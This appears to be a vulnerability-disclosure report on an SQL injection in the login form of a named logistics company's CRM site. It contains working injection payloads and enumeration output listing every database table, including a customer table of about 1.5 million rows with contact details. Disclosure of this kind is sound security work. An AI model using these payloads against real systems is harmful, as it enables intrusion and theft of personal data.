2015-09-20: 细节已通知厂商并且等待厂商处理中 2015-09-24: 厂商已经确认,细节仅向厂商公开 2015-10-04: 细节向核心白帽子及相关领域专家公开 2015-10-14: 细节向普通白帽子公开 2015-10-24: 细节向实习白帽子公开 2015-11-08: 细节向公众公开
RT,这么大的数据,求走个大厂商啊
漏洞系统:CRM管理系统漏洞地址:
POST /login.aspx HTTP/1.1Host: crm.chinawutong.comContent-Length: 460Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://crm.chinawutong.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://crm.chinawutong.com/login.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ASP.NET_SessionId=ypyhncvrkcp4jq45istarx55__VIEWSTATE=%2FwEPDwUKMTg0OTA4MDM5Ng9kFgJmD2QWAgIBD2QWAgIBD2QWAgIDDw9kFgIeBVZhbHVlZWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFHWN0bDAwJE1haW5Db250ZW50JGNieFJlbWVtYmVy%2BPT8xnnTfEawqVDiAEYGXDvJB04%3D&__EVENTVALIDATION=%2FwEWBgKRyKDLDQLwkrODBALil%2B%2BSAgK5ysLjCwKo36WDDQKRnIq9DwMkbemJvGjpIJD0LGAzxJ6h%2FDWg&ctl00%24MainContent%24tbxUserName=admin&ctl00%24MainContent%24tbxPassWord=admin&ctl00%24MainContent%24txtCode=cerc&ctl00%24MainContent%24btnLogin=
ctl00$MainContent$tbxUserName参数存在SQL注入
---Parameter: ctl00$MainContent$tbxUserName (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUKMTg0OTA4MDM5Ng9kFgJmD2QWAgIBD2QWAgIBD2QWAgIDDw9kFgIeBVZhbHVlZWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFHWN0bDAwJE1haW5Db250ZW50JGNieFJlbWVtYmVy+PT8xnnTfEawqVDiAEYGXDvJB04=&__EVENTVALIDATION=/wEWBgKRyKDLDQLwkrODBALil++SAgK5ysLjCwKo36WDDQKRnIq9DwMkbemJvGjpIJD0LGAzxJ6h/DWg&ctl00$MainContent$tbxUserName=admin' AND 2866=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2866=2866) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(113))) AND 'CzCc'='CzCc&ctl00$MainContent$tbxPassWord=admin&ctl00$MainContent$txtCode=xfkt&ctl00$MainContent$btnLogin= Type: UNION query Title: Generic UNION query (NULL) - 33 columns Payload: __VIEWSTATE=/wEPDwUKMTg0OTA4MDM5Ng9kFgJmD2QWAgIBD2QWAgIBD2QWAgIDDw9kFgIeBVZhbHVlZWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFHWN0bDAwJE1haW5Db250ZW50JGNieFJlbWVtYmVy+PT8xnnTfEawqVDiAEYGXDvJB04=&__EVENTVALIDATION=/wEWBgKRyKDLDQLwkrODBALil++SAgK5ysLjCwKo36WDDQKRnIq9DwMkbemJvGjpIJD0LGAzxJ6h/DWg&ctl00$MainContent$tbxUserName=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(107)+CHAR(122)+CHAR(113)+CHAR(88)+CHAR(107)+CHAR(72)+CHAR(90)+CHAR(73)+CHAR(83)+CHAR(65)+CHAR(72)+CHAR(108)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &ctl00$MainContent$tbxPassWord=admin&ctl00$MainContent$txtCode=xfkt&ctl00$MainContent$btnLogin=---
数据库:
表项数:
Database: WutongCRM+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.WTCRM_HND_ContactRecordOld | 1939015 || dbo.WTCRM_HND_ContactRecordOld | 1939015 || dbo.WTCRM_HND_CustomerInfo | 1576796 || dbo.VS_SYS_LogInfo | 950017 || dbo.WTCRM_SYS_LogInfo | 950017 || dbo.WTCRM_HND_VerfiyRecord | 684513 || dbo.WTCRM_HND_ConsultRecord | 602475 || dbo.WTCRM_HND_SeverRecordDelete | 446428 || dbo.WTCRM_HND_WorkRecord | 270504 || dbo.WTCRM_HND_RelationInfo | 231078 || dbo.WTCRM_SYS_EmailRecord | 224168 || dbo.WTCRM_HND_AllocateDetail | 191325 || dbo.WTCRM_HND_AllocateDetail | 191325 || dbo.WTCRM_HND_TemporaryCustomer | 186692 || dbo.WTCRM_HND_CensusInfo | 127971 || dbo.WTCRM_HND_ModifyInfo | 109814 || dbo.WTCRM_HND_ServiceRecord | 100772 || dbo.WTCRM_HND_WorkExamine | 63592 || dbo.WTCRM_HND_logRespondNotice | 63558 || dbo.WTCRM_HND_WXTOpenRecord | 43034 || dbo.WTCRM_HND_OrderRecord | 30579 || dbo.WTCRM_HND_AdvertRecord | 25792 || dbo.WTCRM_HND_OrderInfo | 24946 || dbo.WTCRM_HND_OrderPrintRecord | 24536 || dbo.WTCRM_PEP_ResumeRecord | 21791 || dbo.WTCRM_SYS_BadWord | 19873 || dbo.WTCRM_HND_UpdateRecord | 19039 || dbo.WTCRM_HND_MemberKindAlter | 13759 || dbo.WTCRM_HND_VisitRecord | 12320 || dbo.WTCRM_HND_OrderFullRecord | 10035 || dbo.WTCRM_HND_logRespondContact | 9745 || dbo.WTCRM_HND_ContactExamine | 9732 || dbo.WTCRM_PEP_ResumeInfo | 9133 || dbo.WTCRM_HND_PerfectDegree | 7435 || dbo.WTCRM_HND_UserDelRecord | 7434 || dbo.WTCRM_HND_AppliRemind | 6916 || dbo.WTCRM_HND_OrderAssociate | 6303 || dbo.WTCRM_SYS_PostRecord | 5885 || dbo.WTCRM_SYS_KnowledgeRecord | 5800 || dbo.WTCRM_SYS_KnowledgeShare | 5061 || dbo.WTCRM_HND_MaintainCar | 4987 || dbo.WTCRM_HND_Repeal | 4953 || dbo.WTCRM_HND_ServeInfo | 3265 || dbo.WTCRM_SYS_ListAreas | 3177 || dbo.WTCRM_HND_SyncRecord | 3107 || dbo.WTCRM_HND_AppliRecord | 3058 || dbo.WTCRM_SYS_UserChangeRecord | 2696 || dbo.WTCRM_HND_OrderInvoice | 2646 || dbo.WTCRM_SYS_DepartureRecord | 2435 || dbo.WTCRM_SYS_SalerStore | 2373 || dbo.WTCRM_SYS_UserInfo | 2202 || dbo.VS_SYS_UserInfo | 2198 || dbo.WTCRM_SYS_InvoiceRequest | 1638 || dbo.WTCRM_HND_SaleInfoFW | 1626 || dbo.WTCRM_HND_SaleInfoFW | 1626 || dbo.WTCRM_PEP_Archives | 1315 || dbo.WTCRM_PEP_ExamineXZ | 1263 || dbo.WTCRM_HND_ProxyMaterialsDetail | 1243 || dbo.WTCRM_HND_ProxyMaterialsDetail | 1243 || dbo.WTCRM_HND_Application | 1172 || cdc.lsn_time_mapping | 990 || dbo.WTCRM_HND_OrderSpareMoney | 869 || dbo.WTCRM_HND_AdvertOrderChange | 799 || dbo.CallAuth | 752 || dbo.Hangup | 752 || dbo.WTCRM_FWF_Huo | 674 || dbo.WTCRM_SYS_ElementInfo | 671 || dbo.WTCRM_HND_SaleBusinessPlan | 489 || dbo.WTCRM_HND_ComplaintInfo | 438 || dbo.WTCRM_PEP_Examine | 393 || dbo.WTCRM_PEP_PayCheck | 384 || dbo.WTCRM_PEP_PayChange | 353 || dbo.WTCRM_SYS_Citys | 337 || dbo.WTCRM_FWF_wshiMainline | 313 || dbo.WTCRM_HND_JudgeOrder | 275 || dbo.WTCRM_PEP_ResignInfo | 268 || dbo.CallEstablish | 246 || dbo.WTCRM_PEP_Becomes | 240 || dbo.WTCRM_PEP_LogisticsGrade | 237 || dbo.WTCRM_PEP_ConnectInfo | 230 || dbo.WTCRM_FWF_VehicleLine | 209 || dbo.WTCRM_FWF_VehicleLine | 209 || dbo.WTCRM_SYS_Domain | 187 || dbo.WTCRM_SYS_Suggestion | 179 || dbo.WTCRM_HND_Impression | 174 || dbo.WTCRM_SYS_TeamInfo | 167 || dbo.WTCRM_SYS_GroupInfo | 137 || dbo.WTCRM_SYS_RoleInfo | 129 || dbo.WTCRM_SYS_SubStation | 120 || dbo.WTCRM_PEP_StationChange | 113 || dbo.WTCRM_PEP_SalerGrade | 95 || dbo.WTCRM_PEP_WebAndPosition | 88 || dbo.WTCRM_HND_ProxyInfo | 38 || dbo.WTCRM_SYS_AllAgents | 38 || dbo.WTCRM_SYS_OrderType | 37 || dbo.WTCRM_SYS_Materials | 34 || dbo.WTCRM_SYS_Provinces | 34 || cdc.captured_columns | 33 || dbo.WTCRM_HND_ContactExamineS | 33 || dbo.WTCRM_SYS_TargetSaler | 26 || dbo.WTCRM_HND_OrderVerify | 24 || dbo.WTCRM_SYS_Announcement | 24 || dbo.WTCRM_SYS_DepartmentInfo | 24 || dbo.WTCRM_HND_Elegant | 22 || dbo.WTCRM_SYS_OpenAreas | 21 || dbo.WTCRM_SYS_VOIDAPPID | 21 || dbo.WTCRM_SYS_KeyWords | 17 || dbo.WTCRM_SYS_CustomerProtected | 16 || dbo.WTCRM_HND_LinkLimits | 14 || dbo.WTCRM_HND_TechnologyLog | 14 || dbo.WTCRM_PEP_Wonderful | 14 || cdc.dbo_WTCRM_SYS_UserInfo_CT | 11 || dbo.WTCRM_SYS_Region | 8 || dbo.WTCRM_PEP_Recommend | 5 || dbo.WTCRM_SYS_BaseLimits | 4 || dbo.WTCRM_SYS_TemplateLimits | 4 || cdc.change_tables | 1 || cdc.index_columns | 1 || dbo.WTCRM_FWF_CarTolls | 1 || dbo.WTCRM_FWF_PeiHuo | 1 || dbo.WTCRM_HND_VipVehicleInfo | 1 |+--------------------------------------------------+---------+Database: master+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| sys.messages | 98318 || sys.sysmessages | 98318 || sys.fulltext_system_stopwords | 15829 || sys.syscolumns | 11966 || sys.all_parameters | 7090 || sys.system_parameters | 7090 || sys.trace_subclass_values | 5366 || sys.all_columns | 4670 || sys.system_columns | 4626 || sys.trace_event_bindings | 4304 || sys.syscomments | 2994 || dbo.spt_values | 2508 || sys.all_objects | 1934 || sys.sysobjects | 1934 || sys.system_objects | 1928 || sys.database_permissions | 1844 || sys.syspermissions | 1844 || sys.sysprotects | 1843 || sys.all_sql_modules | 1783 || sys.system_sql_modules | 1783 || sys.dm_audit_actions | 454 || sys.spatial_reference_systems | 390 || sys.event_notification_event_types | 365 || sys.all_views | 354 || sys.system_views | 354 || sys.trigger_event_types | 245 || sys.trace_events | 180 || sys.allocation_units | 128 || sys.partitions | 116 || sys.syscharsets | 114 || sys.xml_schema_facets | 112 || sys.xml_schema_components | 99 || sys.system_components_surface_area_configuration | 95 || sys.dm_audit_class_type_map | 83 || sys.xml_schema_types | 82 || sys.configurations | 70 || sys.sysconfigures | 70 || sys.syscurconfigs | 70 || sys.trace_columns | 66 || sys.fulltext_document_types | 50 || sys.fulltext_languages | 48 || INFORMATION_SCHEMA.COLUMNS | 44 || sys.columns | 44 || sys.systypes | 34 || sys.types | 34 || sys.syslanguages | 33 || sys.securable_classes | 22 || sys.trace_categories | 21 || sys.xml_schema_component_placements | 18 || INFORMATION_SCHEMA.SCHEMATA | 15 || sys.schemas | 15 || sys.xml_schema_attributes | 15 || sys.database_principals | 14 || sys.sysusers | 14 || sys.database_recovery_status | 13 || sys.databases | 13 || sys.sysdatabases | 13 || sys.server_principals | 11 || sys.service_contract_message_usages | 11 || sys.server_permissions | 7 || sys.sysindexes | 7 || sys.indexes | 6 || sys.objects | 6 || sys.stats_columns | 6 || sys.stats_columns | 6 || INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 || INFORMATION_SCHEMA.TABLES | 5 || sys.index_columns | 5 || sys.sysindexkeys | 5 || sys.tables | 5 || sys.endpoints | 4 || sys.assembly_types | 3 || sys.service_queue_usages | 3 || sys.type_assembly_usages | 3 || sys.xml_schema_namespaces | 3 || sys.database_files | 2 || sys.login_token | 2 || sys.service_contract_usages | 2 || sys.sql_logins | 2 || sys.sysfiles | 2 || sys.syslogins | 2 || sys.user_token | 2 || dbo.spt_monitor | 1 || sys.assemblies | 1 || sys.assembly_files | 1 || sys.data_spaces | 1 || sys.database_role_members | 1 || sys.default_constraints | 1 || sys.dm_exec_requests | 1 || sys.dm_exec_sessions | 1 || sys.filegroups | 1 || sys.server_role_members | 1 || sys.servers | 1 || sys.sysconstraints | 1 || sys.sysfilegroups | 1 || sys.sysmembers | 1 || sys.sysprocesses | 1 || sys.sysservers | 1 || sys.tcp_endpoints | 1 || sys.via_endpoints | 1 || sys.xml_schema_collections | 1 || sys.xml_schema_model_groups | 1 || sys.xml_schema_wildcards | 1 |+--------------------------------------------------+---------+Database: msdb+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.backupfile | 910 || dbo.backupmediafamily | 455 || dbo.backupmediaset | 455 || dbo.backupset | 455 || dbo.restorefilegroup | 4 || dbo.restorefilegroup | 4 || dbo.restorehistory | 4 || dbo.syspolicy_configuration | 4 |+--------------------------------------------------+---------+
客户表:
各种详细信息,太多了
Database: WutongCRMTable: WTCRM_HND_CustomerInfo[32 columns]+---------------+----------+| Column | Type |+---------------+----------+| Area | varchar || Attribution | varchar || CellPhone | varchar || City | varchar || CompanyKind | varchar || CompanyName | varchar || Country | varchar || CurrentStatus | varchar || CustomerID | int || CustomerKind | varchar || CustomerName | varchar || DataBaseID | int || DetailAddress | varchar || Email | varchar || Fax | varchar || IsAdvisory | int || IsShow | bit || ModifyTime | datetime || ModifyUserID | int || OrderID | int || Position | varchar || Province | varchar || QQ | varchar || RecordMethod | varchar || RecordTime | datetime || RenewStatus | varchar || Role | varchar || SaleID | int || Sex | varchar || TelePhone | varchar || UserID | int || Verify | int |+---------------+----------+
过滤
危害等级:高
漏洞Rank:15
确认时间:2015-09-24 11:04
感谢对我们的支持
暂无